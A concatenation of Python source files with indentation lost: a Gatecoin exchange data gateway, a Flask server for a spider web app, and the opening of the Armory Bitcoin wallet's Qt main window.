(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trade_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trade_timestamp_field_name()])
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if 'transactions' in res.keys():
trades_raw = res['transactions']
if len(trades_raw) > 0:
for t in trades_raw:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwGatecoin(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiGatecoin(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Gatecoin'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Gatecoin'
instmt_name = 'BTCHKD'
instmt_code = 'BTCHKD'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwGatecoin([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_order_book_table_name(exch.get_order_book_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_trades_table_name(exch.get_trades_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
server.py
|
import sys
import os
from datetime import timedelta
import threading
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(os.path.split(rootPath)[0])
from src.web.web_util.web_util import judge_pool, get_redis_conn, begin_check_redis
from flask import Flask, render_template,session
from src.web.controller.dataController import data, POOL_FLAG
from src.web.controller.spiderController import spider
from src.util.constant import WAITING_USER_LIST
from flask_cors import *
app = Flask(__name__)
CORS(app, supports_credentials=True) # 设置跨域
app.config['SECRET_KEY']=os.urandom(24)
app.config['PERMANENT_SESSION_LIFETIME']=timedelta(days=7)
host = judge_pool()
conn = get_redis_conn(host)
conn.delete(WAITING_USER_LIST)
@app.route('/')
def config():
session[POOL_FLAG] = judge_pool()
print("pool flag:", session.get(POOL_FLAG))
return render_template("config.html")
@app.route('/error')
def error():
return render_template("error.html")
@app.route('/cookie')
def cookie():
return render_template("cookie.html")
app.register_blueprint(spider, url_prefix='/spider')
app.register_blueprint(data, url_prefix='/data')
if __name__ == '__main__':
t = threading.Thread(target=begin_check_redis)
t.start()
app.run(host='0.0.0.0', port=5000, debug=False)
|
ArmoryQt.py
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
################################################################################
# #
# Copyright (C) 2011-2015, Armory Technologies, Inc. #
# Distributed under the GNU Affero General Public License (AGPL v3) #
# See LICENSE or http://www.gnu.org/licenses/agpl.html #
# #
################################################################################
import gettext
from copy import deepcopy
from datetime import datetime
import hashlib
import logging
import math
import os
import platform
import random
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import webbrowser
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import psutil
from twisted.internet.defer import Deferred
from twisted.internet.protocol import Protocol, ClientFactory
import CppBlockUtils as Cpp
from announcefetch import AnnounceDataFetcher, ANNOUNCE_URL, ANNOUNCE_URL_BACKUP, \
DEFAULT_FETCH_INTERVAL
from armorycolors import Colors, htmlColor, QAPP
from armoryengine.ALL import *
from armoryengine.Block import PyBlock
from armoryengine.Decorators import RemoveRepeatingExtensions
from armoryengine.PyBtcWalletRecovery import WalletConsistencyCheck
from armoryengine.parseAnnounce import changelogParser, downloadLinkParser, \
notificationParser
from armorymodels import *
from jasvet import verifySignature
import qrc_img_resources
from qtdefines import *
from qtdialogs import *
from ui.MultiSigDialogs import DlgSelectMultiSigOption, DlgLockboxManager, \
DlgMergePromNotes, DlgCreatePromNote, DlgImportAsciiBlock
from ui.VerifyOfflinePackage import VerifyOfflinePackageDialog
from ui.Wizards import WalletWizard, TxWizard
from ui.toolsDialogs import MessageSigningVerificationDialog
from dynamicImport import MODULE_PATH_KEY, ZIP_EXTENSION, getModuleList, importModule,\
verifyZipSignature, MODULE_ZIP_STATUS, INNER_ZIP_FILENAME,\
MODULE_ZIP_STATUS_KEY, getModuleListNoZip, dynamicImportNoZip
import tempfile
# Load our framework with OS X-specific code.
if OS_MACOSX:
import ArmoryMac
# HACK ALERT: Qt has a bug in OS X where the system font settings will override
# the app's settings when a window is activated (e.g., Armory starts, the user
# switches to another app, and then switches back to Armory). There is a
# workaround, as used by TeXstudio and other programs.
# https://bugreports.qt-project.org/browse/QTBUG-5469 - Bug discussion.
# http://sourceforge.net/p/texstudio/bugs/594/?page=1 - Fix is mentioned.
# http://pyqt.sourceforge.net/Docs/PyQt4/qapplication.html#setDesktopSettingsAware
# - Mentions that this must be called before the app (QAPP) is created.
if OS_MACOSX:
QApplication.setDesktopSettingsAware(False)
# PyQt4 Imports
# All the twisted/networking functionality
if OS_WINDOWS:
from _winreg import *
MODULES_ZIP_DIR_NAME = 'modules'
class ArmoryMainWindow(QMainWindow):
""" The primary Armory window """
#############################################################################
def __init__(self, parent=None, splashScreen=None):
super(ArmoryMainWindow, self).__init__(parent)
self.isShuttingDown = False
# Load the settings file
self.settingsPath = CLI_OPTIONS.settingsPath
self.settings = SettingsFile(self.settingsPath)
# SETUP THE WINDOWS DECORATIONS
self.lblLogoIcon = QLabel()
if USE_TESTNET:
self.setWindowTitle('Armory - Bitcoin Wallet Management [TESTNET] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
else:
self.setWindowTitle('Armory - Bitcoin Wallet Management')
self.iconfile = ':/armory_icon_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_h44.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_h56.png'))
# OS X requires some Objective-C code if we're switching to the testnet
# (green) icon. We should also use a larger icon. Otherwise, Info.plist
# takes care of everything.
if not OS_MACOSX:
self.setWindowIcon(QIcon(self.iconfile))
else:
self.notifCtr = ArmoryMac.MacNotificationHandler.None
if USE_TESTNET:
self.iconfile = ':/armory_icon_green_fullres.png'
ArmoryMac.MacDockIconHandler.instance().setMainWindow(self)
ArmoryMac.MacDockIconHandler.instance().setIcon(QIcon(self.iconfile))
self.lblLogoIcon.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.netMode = NETWORKMODE.Offline
self.abortLoad = False
self.memPoolInit = False
self.needUpdateAfterScan = True
self.sweepAfterScanList = []
self.newWalletList = []
self.newZeroConfSinceLastUpdate = []
self.lastSDMState = BDM_UNINITIALIZED
self.doShutdown = False
self.downloadDict = {}
self.notAvailErrorCount = 0
self.satoshiVerWarnAlready = False
self.satoshiLatestVer = None
self.latestVer = {}
self.downloadDict = {}
self.satoshiHomePath = None
self.satoshiExeSearchPath = None
self.initSyncCircBuff = []
self.latestVer = {}
self.lastVersionsTxtHash = ''
self.dlgCptWlt = None
self.torrentFinished = False
self.torrentCircBuffer = []
self.lastAskedUserStopTorrent = 0
self.wasSynchronizing = False
self.announceIsSetup = False
self.entropyAccum = []
self.allLockboxes = []
self.lockboxIDMap = {}
self.cppLockboxWltMap = {}
# Full list of notifications, and notify IDs that should trigger popups
# when sending or receiving.
self.lastAnnounceUpdate = {}
self.changelog = []
self.downloadLinks = {}
self.almostFullNotificationList = {}
self.notifyOnSend = set()
self.notifyonRecv = set()
self.versionNotification = {}
self.notifyIgnoreLong = []
self.notifyIgnoreShort = []
self.maxPriorityID = None
self.satoshiVersions = ['',''] # [curr, avail]
self.armoryVersions = [getVersionString(BTCARMORY_VERSION), '']
self.NetworkingFactory = None
self.tempModulesDirName = None
self.internetStatus = None
# We only need a single connection to bitcoind since it's a
# reconnecting connection, so we keep it around.
self.SingletonConnectedNetworkingFactory = None
# Kick off announcement checking, unless they explicitly disabled it
# The fetch happens in the background, we check the results periodically
self.announceFetcher = None
self.setupAnnouncementFetcher()
#delayed URI parsing dict
self.delayedURIData = {}
self.delayedURIData['qLen'] = 0
#Setup the signal to spawn progress dialogs from the main thread
self.connect(self, SIGNAL('initTrigger') , self.initTrigger)
self.connect(self, SIGNAL('execTrigger'), self.execTrigger)
self.connect(self, SIGNAL('checkForNegImports'), self.checkForNegImports)
#generic signal to run pass any method as the arg
self.connect(self, SIGNAL('method_signal') , self.method_signal)
#push model BDM notify signal
self.connect(self, SIGNAL('cppNotify'), self.handleCppNotification)
TheBDM.registerCppNotification(self.cppNotifySignal)
# We want to determine whether the user just upgraded to a new version
self.firstLoadNewVersion = False
currVerStr = 'v'+getVersionString(BTCARMORY_VERSION)
if self.settings.hasSetting('LastVersionLoad'):
lastVerStr = self.settings.get('LastVersionLoad')
if not lastVerStr==currVerStr:
LOGINFO('First load of new version: %s', currVerStr)
self.firstLoadNewVersion = True
self.settings.set('LastVersionLoad', currVerStr)
# Because dynamically retrieving addresses for querying transaction
# comments can be so slow, I use this txAddrMap to cache the mappings
# between tx's and addresses relevant to our wallets. It really only
# matters for massive tx with hundreds of outputs -- but such tx do
# exist and this is needed to accommodate wallets with lots of them.
self.txAddrMap = {}
def updateProgress(val):
if splashScreen is not None:
splashScreen.updateProgress(val)
self.loadWalletsAndSettings(updateProgress)
eulaAgreed = self.getSettingOrSetDefault('Agreed_to_EULA', False)
if not eulaAgreed:
DlgEULA(self,self).exec_()
if not self.abortLoad:
self.setupNetworking()
# setupNetworking may have set this flag if something went wrong
if self.abortLoad:
LOGWARN('Armory startup was aborted. Closing.')
os._exit(0)
# We need to query this once at the beginning, to avoid having
# strange behavior if the user changes the setting but hasn't
# restarted yet...
self.doAutoBitcoind = \
self.getSettingOrSetDefault('ManageSatoshi', not OS_MACOSX)
# This is a list of alerts that the user has chosen to no longer
# be notified about
alert_str = str(self.getSettingOrSetDefault('IgnoreAlerts', ""))
if alert_str == "":
alerts = []
else:
alerts = alert_str.split(",")
self.ignoreAlerts = {int(s):True for s in alerts}
# If we're going into online mode, start loading blockchain
if self.doAutoBitcoind:
self.startBitcoindIfNecessary()
else:
self.loadBlockchainIfNecessary()
# Setup system tray and register "bitcoin:" URLs with the OS
self.setupSystemTray()
self.setupUriRegistration()
self.heartbeatCount = 0
self.extraHeartbeatSpecial = []
self.extraHeartbeatAlways = []
self.extraHeartbeatOnline = []
self.extraNewTxFunctions = []
self.extraNewBlockFunctions = []
self.extraShutdownFunctions = []
self.extraGoOnlineFunctions = []
self.walletDialogDict = {}
self.lblArmoryStatus = QRichLabel(tr('<font color=%(color)s>Offline</font> ') %
{ 'color' : htmlColor('TextWarn') }, doWrap=False)
self.statusBar().insertPermanentWidget(0, self.lblArmoryStatus)
# Table for all the wallets
self.walletModel = AllWalletsDispModel(self)
self.walletsView = QTableView(self)
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.walletsView.setModel(self.walletModel)
self.walletsView.setSelectionBehavior(QTableView.SelectRows)
self.walletsView.setSelectionMode(QTableView.SingleSelection)
self.walletsView.verticalHeader().setDefaultSectionSize(sectionSz)
self.walletsView.setMinimumSize(viewWidth, viewHeight)
self.walletsView.setItemDelegate(AllWalletsCheckboxDelegate(self))
self.walletsView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.walletsView.hideColumn(0)
if self.usermode == USERMODE.Standard:
initialColResize(self.walletsView, [20, 0, 0.35, 0.2, 0.2])
else:
initialColResize(self.walletsView, [20, 0.15, 0.30, 0.2, 0.20])
if self.settings.hasSetting('LastFilterState'):
if self.settings.get('LastFilterState')==4:
self.walletsView.showColumn(0)
self.connect(self.walletsView, SIGNAL('doubleClicked(QModelIndex)'),
self.execDlgWalletDetails)
self.connect(self.walletsView, SIGNAL('clicked(QModelIndex)'),
self.execClickRow)
self.walletsView.setColumnWidth(WLTVIEWCOLS.Visible, 20)
w,h = tightSizeNChar(GETFONT('var'), 100)
# Prepare for tableView slices (i.e. "Showing 1 to 100 of 382", etc)
self.numShowOpts = [100,250,500,1000,'All']
self.sortLedgOrder = Qt.AscendingOrder
self.sortLedgCol = 0
self.currLedgMin = 1
self.currLedgMax = 100
self.currLedgWidth = 100
# Table to display ledger/activity
self.ledgerTable = []
self.ledgerModel = LedgerDispModelSimple(self.ledgerTable, self, self)
self.ledgerModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForWallets())
self.ledgerModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.frmLedgUpDown = QFrame()
self.ledgerView = ArmoryTableView(self, self, self.frmLedgUpDown)
self.ledgerView.setModel(self.ledgerModel)
self.ledgerView.setSortingEnabled(True)
self.ledgerView.setItemDelegate(LedgerDispDelegate(self))
self.ledgerView.setSelectionBehavior(QTableView.SelectRows)
self.ledgerView.setSelectionMode(QTableView.SingleSelection)
self.ledgerView.verticalHeader().setDefaultSectionSize(sectionSz)
self.ledgerView.verticalHeader().hide()
self.ledgerView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.ledgerView.horizontalHeader().setResizeMode(3, QHeaderView.Fixed)
self.ledgerView.hideColumn(LEDGERCOLS.isOther)
self.ledgerView.hideColumn(LEDGERCOLS.UnixTime)
self.ledgerView.hideColumn(LEDGERCOLS.WltID)
self.ledgerView.hideColumn(LEDGERCOLS.TxHash)
self.ledgerView.hideColumn(LEDGERCOLS.isCoinbase)
self.ledgerView.hideColumn(LEDGERCOLS.toSelf)
self.ledgerView.hideColumn(LEDGERCOLS.DoubleSpend)
# Another table and model, for lockboxes
self.currentLBPage = 0
self.lockboxLedgTable = []
self.lockboxLedgModel = LedgerDispModelSimple(self.lockboxLedgTable,
self, self, isLboxModel=True)
self.lockboxLedgModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForLockboxes())
self.lockboxLedgModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.lbDialogModel = None
dateWidth = tightSizeStr(self.ledgerView, '_9999-Dec-99 99:99pm__')[0]
nameWidth = tightSizeStr(self.ledgerView, '9'*32)[0]
cWidth = 20 # num-confirm icon width
tWidth = 72 # date icon width
initialColResize(self.ledgerView, [cWidth, 0, dateWidth, tWidth, 0.30, 0.40, 0.3])
self.connect(self.ledgerView, SIGNAL('doubleClicked(QModelIndex)'), \
self.dblClickLedger)
self.ledgerView.setContextMenuPolicy(Qt.CustomContextMenu)
self.ledgerView.customContextMenuRequested.connect(self.showContextMenuLedger)
btnAddWallet = QPushButton(tr("Create Wallet"))
btnImportWlt = QPushButton(tr("Import or Restore Wallet"))
self.connect(btnAddWallet, SIGNAL('clicked()'), self.startWalletWizard)
self.connect(btnImportWlt, SIGNAL('clicked()'), self.execImportWallet)
# Put the Wallet info into it's own little box
lblAvail = QLabel(tr("<b>Available Wallets:</b>"))
viewHeader = makeLayoutFrame(HORIZONTAL, [lblAvail, \
'Stretch', \
btnAddWallet, \
btnImportWlt, ])
wltFrame = QFrame()
wltFrame.setFrameStyle(QFrame.Box|QFrame.Sunken)
wltLayout = QGridLayout()
wltLayout.addWidget(viewHeader, 0,0, 1,3)
wltLayout.addWidget(self.walletsView, 1,0, 1,3)
wltFrame.setLayout(wltLayout)
# Make the bottom 2/3 a tabwidget
self.mainDisplayTabs = QTabWidget()
# Put the labels into scroll areas just in case window size is small.
self.tabDashboard = QWidget()
self.setupDashboard()
# Combo box to filter ledger display
self.comboWltSelect = QComboBox()
self.populateLedgerComboBox()
self.connect(self.ledgerView.horizontalHeader(), \
SIGNAL('sortIndicatorChanged(int,Qt::SortOrder)'), \
self.changeLedgerSorting)
self.connect(self.comboWltSelect, SIGNAL('activated(int)'),
self.changeWltFilter)
self.lblTot = QRichLabel('<b>Maximum Funds:</b>', doWrap=False);
self.lblSpd = QRichLabel('<b>Spendable Funds:</b>', doWrap=False);
self.lblUcn = QRichLabel('<b>Unconfirmed:</b>', doWrap=False);
self.lblTotalFunds = QRichLabel('-'*12, doWrap=False)
self.lblSpendFunds = QRichLabel('-'*12, doWrap=False)
self.lblUnconfFunds = QRichLabel('-'*12, doWrap=False)
self.lblTotalFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpendFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUnconfFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblTot.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpd.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUcn.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblBTC1 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC2 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC3 = QRichLabel('<b>BTC</b>', doWrap=False)
self.ttipTot = self.createToolTipWidget( \
'Funds if all current transactions are confirmed. '
'Value appears gray when it is the same as your spendable funds.')
self.ttipSpd = self.createToolTipWidget( 'Funds that can be spent <i>right now</i>')
self.ttipUcn = self.createToolTipWidget( \
'Funds that have less than 6 confirmations, and thus should not '
'be considered <i>yours</i>, yet.')
frmTotals = QFrame()
frmTotals.setFrameStyle(STYLE_NONE)
frmTotalsLayout = QGridLayout()
frmTotalsLayout.addWidget(self.lblTot, 0,0)
frmTotalsLayout.addWidget(self.lblSpd, 1,0)
frmTotalsLayout.addWidget(self.lblUcn, 2,0)
frmTotalsLayout.addWidget(self.lblTotalFunds, 0,1)
frmTotalsLayout.addWidget(self.lblSpendFunds, 1,1)
frmTotalsLayout.addWidget(self.lblUnconfFunds, 2,1)
frmTotalsLayout.addWidget(self.lblBTC1, 0,2)
frmTotalsLayout.addWidget(self.lblBTC2, 1,2)
frmTotalsLayout.addWidget(self.lblBTC3, 2,2)
frmTotalsLayout.addWidget(self.ttipTot, 0,3)
frmTotalsLayout.addWidget(self.ttipSpd, 1,3)
frmTotalsLayout.addWidget(self.ttipUcn, 2,3)
frmTotals.setLayout(frmTotalsLayout)
#page selection UI
self.mainLedgerCurrentPage = 1
self.lblPages = QRichLabel('Page: ')
self.PageLineEdit = QLineEdit('1')
self.lblNPages = QRichLabel(' out of 1')
self.connect(self.PageLineEdit, SIGNAL('editingFinished()'), \
self.loadNewPage)
self.changeWltFilter()
# Will fill this in when ledgers are created & combined
self.lblLedgShowing = QRichLabel('Showing:', hAlign=Qt.AlignHCenter)
self.lblLedgRange = QRichLabel('', hAlign=Qt.AlignHCenter)
self.lblLedgTotal = QRichLabel('', hAlign=Qt.AlignHCenter)
self.comboNumShow = QComboBox()
for s in self.numShowOpts:
self.comboNumShow.addItem( str(s) )
self.comboNumShow.setCurrentIndex(0)
self.comboNumShow.setMaximumWidth( tightSizeStr(self, '_9999_')[0]+25 )
self.btnLedgUp = QLabelButton('')
self.btnLedgUp.setMaximumHeight(20)
self.btnLedgUp.setPixmap(QPixmap(':/scroll_up_18.png'))
self.btnLedgUp.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.btnLedgUp.setVisible(False)
self.btnLedgDn = QLabelButton('')
self.btnLedgDn.setMaximumHeight(20)
self.btnLedgDn.setPixmap(QPixmap(':/scroll_down_18.png'))
self.btnLedgDn.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.connect(self.comboNumShow, SIGNAL('activated(int)'), self.changeNumShow)
self.connect(self.btnLedgUp, SIGNAL('clicked()'), self.clickLedgUp)
self.connect(self.btnLedgDn, SIGNAL('clicked()'), self.clickLedgDn)
frmFilter = makeVertFrame([QLabel(tr('Filter:')), self.comboWltSelect, 'Stretch'])
frmLower = makeHorizFrame([ frmFilter, \
'Stretch', \
self.frmLedgUpDown, \
'Stretch', \
frmTotals])
# Now add the ledger to the bottom of the window
ledgLayout = QGridLayout()
ledgLayout.addWidget(self.ledgerView, 1,0)
ledgLayout.addWidget(frmLower, 2,0)
ledgLayout.setRowStretch(0, 0)
ledgLayout.setRowStretch(1, 1)
ledgLayout.setRowStretch(2, 0)
self.tabActivity = QWidget()
self.tabActivity.setLayout(ledgLayout)
self.tabAnnounce = QWidget()
self.setupAnnounceTab()
# Add the available tabs to the main tab widget
self.MAINTABS = enum('Dash','Ledger','Announce')
self.mainDisplayTabs.addTab(self.tabDashboard, tr('Dashboard'))
self.mainDisplayTabs.addTab(self.tabActivity, tr('Transactions'))
self.mainDisplayTabs.addTab(self.tabAnnounce, tr('Announcements'))
##########################################################################
if not CLI_OPTIONS.disableModules:
if USE_TESTNET:
self.loadArmoryModulesNoZip()
# Armory Modules are diabled on main net. If enabled it uses zip files to
# contain the modules
# else:
# self.loadArmoryModules()
##########################################################################
self.lbDialog = None
btnSendBtc = QPushButton(tr("Send Bitcoins"))
btnRecvBtc = QPushButton(tr("Receive Bitcoins"))
btnWltProps = QPushButton(tr("Wallet Properties"))
btnOfflineTx = QPushButton(tr("Offline Transactions"))
btnMultisig = QPushButton(tr("Lockboxes (Multi-Sig)"))
self.connect(btnWltProps, SIGNAL('clicked()'), self.execDlgWalletDetails)
self.connect(btnRecvBtc, SIGNAL('clicked()'), self.clickReceiveCoins)
self.connect(btnSendBtc, SIGNAL('clicked()'), self.clickSendBitcoins)
self.connect(btnOfflineTx,SIGNAL('clicked()'), self.execOfflineTx)
self.connect(btnMultisig, SIGNAL('clicked()'), self.browseLockboxes)
verStr = 'Armory %s / %s' % (getVersionString(BTCARMORY_VERSION),
UserModeStr(self.usermode))
lblInfo = QRichLabel(verStr, doWrap=False)
lblInfo.setFont(GETFONT('var',10))
lblInfo.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
logoBtnFrame = []
logoBtnFrame.append(self.lblLogoIcon)
logoBtnFrame.append(btnSendBtc)
logoBtnFrame.append(btnRecvBtc)
logoBtnFrame.append(btnWltProps)
if self.usermode in (USERMODE.Advanced, USERMODE.Expert):
logoBtnFrame.append(btnOfflineTx)
if self.usermode in (USERMODE.Expert,):
logoBtnFrame.append(btnMultisig)
logoBtnFrame.append(lblInfo)
logoBtnFrame.append('Stretch')
btnFrame = makeVertFrame(logoBtnFrame, STYLE_SUNKEN)
logoWidth=220
btnFrame.sizeHint = lambda: QSize(logoWidth*1.0, 10)
btnFrame.setMaximumWidth(logoWidth*1.2)
btnFrame.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
layout = QGridLayout()
layout.addWidget(btnFrame, 0, 0, 1, 1)
layout.addWidget(wltFrame, 0, 1, 1, 1)
layout.addWidget(self.mainDisplayTabs, 1, 0, 1, 2)
layout.setRowStretch(0, 1)
layout.setRowStretch(1, 5)
# Attach the layout to the frame that will become the central widget
mainFrame = QFrame()
mainFrame.setLayout(layout)
self.setCentralWidget(mainFrame)
self.setMinimumSize(750,500)
# Start the user at the dashboard
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
##########################################################################
# Set up menu and actions
#MENUS = enum('File', 'Wallet', 'User', "Tools", "Network")
currmode = self.getSettingOrSetDefault('User_Mode', 'Advanced')
MENUS = enum('File', 'User', 'Tools', 'Addresses', 'Wallets', \
'MultiSig', 'Help')
self.menu = self.menuBar()
self.menusList = []
self.menusList.append( self.menu.addMenu(tr('&File')) )
self.menusList.append( self.menu.addMenu(tr('&User')) )
self.menusList.append( self.menu.addMenu(tr('&Tools')) )
self.menusList.append( self.menu.addMenu(tr('&Addresses')) )
self.menusList.append( self.menu.addMenu(tr('&Wallets')) )
self.menusList.append( self.menu.addMenu(tr('&MultiSig')) )
self.menusList.append( self.menu.addMenu(tr('&Help')) )
#self.menusList.append( self.menu.addMenu('&Network') )
def exportTx():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, 'Transactions Unavailable', \
'Transaction history cannot be collected until Armory is '
'in online mode. Please try again when Armory is online. ',
QMessageBox.Ok)
return
else:
DlgExportTxHistory(self,self).exec_()
actExportTx = self.createAction('&Export Transactions...', exportTx)
actSettings = self.createAction('&Settings...', self.openSettings)
actMinimApp = self.createAction('&Minimize Armory', self.minimizeArmory)
actExportLog = self.createAction('Export &Log File...', self.exportLogFile)
actCloseApp = self.createAction('&Quit Armory', self.closeForReal)
self.menusList[MENUS.File].addAction(actExportTx)
self.menusList[MENUS.File].addAction(actSettings)
self.menusList[MENUS.File].addAction(actMinimApp)
self.menusList[MENUS.File].addAction(actExportLog)
self.menusList[MENUS.File].addAction(actCloseApp)
def chngStd(b):
if b: self.setUserMode(USERMODE.Standard)
def chngAdv(b):
if b: self.setUserMode(USERMODE.Advanced)
def chngDev(b):
if b: self.setUserMode(USERMODE.Expert)
modeActGrp = QActionGroup(self)
actSetModeStd = self.createAction('&Standard', chngStd, True)
actSetModeAdv = self.createAction('&Advanced', chngAdv, True)
actSetModeDev = self.createAction('&Expert', chngDev, True)
modeActGrp.addAction(actSetModeStd)
modeActGrp.addAction(actSetModeAdv)
modeActGrp.addAction(actSetModeDev)
self.menusList[MENUS.User].addAction(actSetModeStd)
self.menusList[MENUS.User].addAction(actSetModeAdv)
self.menusList[MENUS.User].addAction(actSetModeDev)
LOGINFO('Usermode: %s', currmode)
self.firstModeSwitch=True
if currmode=='Standard':
self.usermode = USERMODE.Standard
actSetModeStd.setChecked(True)
elif currmode=='Advanced':
self.usermode = USERMODE.Advanced
actSetModeAdv.setChecked(True)
elif currmode=='Expert':
self.usermode = USERMODE.Expert
actSetModeDev.setChecked(True)
def openMsgSigning():
MessageSigningVerificationDialog(self,self).exec_()
def openBlindBroad():
if not satoshiIsAvailable():
QMessageBox.warning(self, tr("Not Online"), tr("""
Bitcoin Core is not available, so Armory will not be able
to broadcast any transactions for you."""), QMessageBox.Ok)
return
DlgBroadcastBlindTx(self,self).exec_()
actOpenSigner = self.createAction('&Message Signing/Verification...', openMsgSigning)
if currmode=='Expert':
actOpenTools = self.createAction('&EC Calculator...', lambda: DlgECDSACalc(self,self, 1).exec_())
actBlindBroad = self.createAction('&Broadcast Raw Transaction...', openBlindBroad)
self.menusList[MENUS.Tools].addAction(actOpenSigner)
if currmode=='Expert':
self.menusList[MENUS.Tools].addAction(actOpenTools)
self.menusList[MENUS.Tools].addAction(actBlindBroad)
def mkprom():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, tr('Offline'), tr("""
Armory is currently offline, and cannot determine what funds are
available for simulfunding. Please try again when Armory is in
online mode."""), QMessageBox.Ok)
else:
DlgCreatePromNote(self, self).exec_()
def msrevsign():
title = tr('Import Multi-Spend Transaction')
descr = tr("""
Import a signature-collector text block for review and signing.
It is usually a block of text with "TXSIGCOLLECT" in the first line,
or a <i>*.sigcollect.tx</i> file.""")
ftypes = ['Signature Collectors (*.sigcollect.tx)']
